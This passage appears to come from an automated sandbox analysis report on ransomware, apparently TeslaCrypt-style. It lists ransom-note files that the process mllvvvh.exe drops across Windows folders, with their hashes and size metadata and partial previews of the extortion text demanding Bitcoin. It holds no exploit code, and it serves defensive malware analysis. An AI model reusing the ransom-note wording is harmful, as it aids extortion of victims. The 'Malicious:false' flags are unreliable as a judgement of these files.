                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
